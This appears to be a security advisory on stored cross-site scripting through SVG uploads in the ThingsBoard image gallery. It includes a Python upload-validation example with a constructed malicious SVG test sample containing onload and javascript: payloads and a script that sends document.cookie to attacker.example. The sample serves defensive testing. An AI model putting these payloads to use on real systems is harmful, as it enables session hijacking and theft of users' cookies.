ThingsBoard Stored Cross-Site Scripting Vulnerability in Image Upload Gallery

Vulnerability

A stored cross-site scripting vulnerability has been identified in ThingsBoard versions prior to 4.2.1. It resides in the dashboard's Image Upload Gallery, which accepts SVG files without sanitizing their content and without properly validating their content type. An attacker who can upload to the gallery can therefore store an SVG that carries JavaScript (SVG can embed it in a <script> element, in event-handler attributes such as onload, or in javascript: URLs), and that script may execute in the browser of a user for whom the image is rendered in the user interface. Whether it actually runs depends on how the image is rendered: an SVG loaded through an <img> element does not execute script, but one that is inlined into the page, opened directly, or served with a scriptable content type does.
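
The two checks whose absence the advisory describes, written out as an added example (illustrative code for this page, not ThingsBoard's own code or its fix): the declared content type is compared with what the uploaded bytes actually are, and an SVG body is rejected when it contains script or script-capable markup. The sample uploads, the element and attribute lists, and the function names are assumptions made for the example.

```python
"""Server-side gate for SVG uploads to an image gallery.

Added example for this advisory; not ThingsBoard's code or its fix.
It performs the two checks the advisory says were missing: the declared
content type is verified against the uploaded bytes, and SVG bodies are
rejected when they carry script or script-capable markup.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Elements that execute script or load arbitrary active content when an
# SVG is rendered inline in a page (list chosen for this example).
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}

# Attributes whose value is, or can become, a URL the browser follows.
# "from"/"to"/"values" are included because <set>/<animate> can rewrite
# href at runtime, e.g. <set attributeName="href" to="javascript:...">.
URL_ATTRIBUTES = {"href", "src", "from", "to", "values"}

# What an SVG document may start with: optional BOM, whitespace, XML
# declaration, comments and a DOCTYPE, then the <svg> root element.
_SVG_PREFIX = re.compile(
    rb"^(\xef\xbb\xbf)?\s*(<\?xml[^>]*\?>\s*)?(<!--.*?-->\s*)*"
    rb"(<!DOCTYPE[^>]*>\s*)?<svg[\s>/]",
    re.DOTALL | re.IGNORECASE,
)


def local_name(qualified: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags/attributes."""
    return qualified.rsplit("}", 1)[-1]


def is_script_url(value: str) -> bool:
    """True for javascript:/vbscript:/data: URLs. Whitespace and control
    characters are removed first because browsers ignore them inside a
    scheme ("java<TAB>script:" still runs); data: is refused outright
    since it can wrap a second, scripted SVG."""
    cleaned = re.sub(r"[\x00-\x20]", "", value).lower()
    return cleaned.startswith(("javascript:", "vbscript:", "data:"))


def find_active_content(svg_bytes: bytes) -> list[str]:
    """Return the reasons an SVG must be rejected; empty means clean.

    ElementTree keeps the example short; a production parser should also
    refuse DTDs and entity expansion (e.g. defusedxml) to avoid XXE.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    reasons: list[str] = []
    if local_name(root.tag) != "svg":
        reasons.append(f"root element is <{local_name(root.tag)}>, not <svg>")

    for elem in root.iter():
        tag = local_name(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            reasons.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            name = local_name(attr)
            if name.lower().startswith("on"):  # onload, onclick, onerror, ...
                reasons.append(f"event handler {name}= on <{tag}>")
            elif name.lower() in URL_ATTRIBUTES and is_script_url(value):
                reasons.append(f"script URL in {name}= on <{tag}>")
    return reasons


def check_svg_upload(declared_type: str, data: bytes) -> tuple[bool, list[str]]:
    """Gate applied to every gallery upload. Returns (accepted, reasons).

    A body declared image/svg+xml must really be SVG and must pass
    find_active_content(). Any other declared type is rejected if the bytes
    are in fact SVG, so a scriptable file cannot be smuggled in as a PNG;
    genuine non-SVG bodies pass this gate to the raster checks (not shown).
    """
    media_type = declared_type.split(";", 1)[0].strip().lower()
    looks_like_svg = _SVG_PREFIX.match(data) is not None

    if media_type == "image/svg+xml":
        if not looks_like_svg:
            return False, ["declared image/svg+xml but body is not an SVG document"]
        reasons = find_active_content(data)
        return (not reasons), reasons
    if looks_like_svg:
        return False, [f"body is SVG but declared as {media_type}"]
    return True, []


# Constructed sample uploads for this example (not from any real instance).
BENIGN_SVG = (
    b'<?xml version="1.0"?>\n'
    b'<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">'
    b'<circle cx="8" cy="8" r="6" fill="#3a7"/></svg>'
)
MALICIOUS_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" '
    b'xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">'
    b'<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    b'<a xlink:href="java&#9;script:alert(2)"><text y="12">click</text></a>'
    b'</svg>'
)

if __name__ == "__main__":
    for label, ctype, body in [
        ("benign svg", "image/svg+xml", BENIGN_SVG),
        ("scripted svg", "image/svg+xml", MALICIOUS_SVG),
        ("scripted svg as png", "image/png", MALICIOUS_SVG),
    ]:
        accepted, why = check_svg_upload(ctype, body)
        print(f"{label}: {'accepted' if accepted else 'rejected'} {why}")
```

Rejecting is chosen over stripping on purpose: a sanitizer that rewrites SVG has to track every script-capable element and attribute across browser versions, while a dashboard gallery rarely needs more than shapes, paths and text. Serving stored images with a restrictive Content-Security-Policy, and never inlining user-supplied SVG into the application's DOM, is an independent layer that limits the damage if an upload check is bypassed.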

Impact

Exploitation results in stored cross-site scripting: JavaScript carried in an uploaded SVG runs in the browser of any user for whom the image is rendered in the UI, inside that user's authenticated ThingsBoard session, so the attacker's script can act with that user's privileges.

Remediation

Upgrade to ThingsBoard version 4.2.1 or later, where this vulnerability has been fixed. Because the issue is stored, also review SVG files already present in the gallery of an upgraded instance for embedded script, since an upgrade alone is not guaranteed to remove content uploaded before the fix.

Added: Oct 17, 2025, 7:22 PM
Updated: Oct 17, 2025, 7:22 PM

Vulnerability Rating

Custom Algorithm
spread: 5.0
impact: 1.7
exploitability: 5.0
remediation: 7.7
relevance: 0.8
threat: 0.0
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.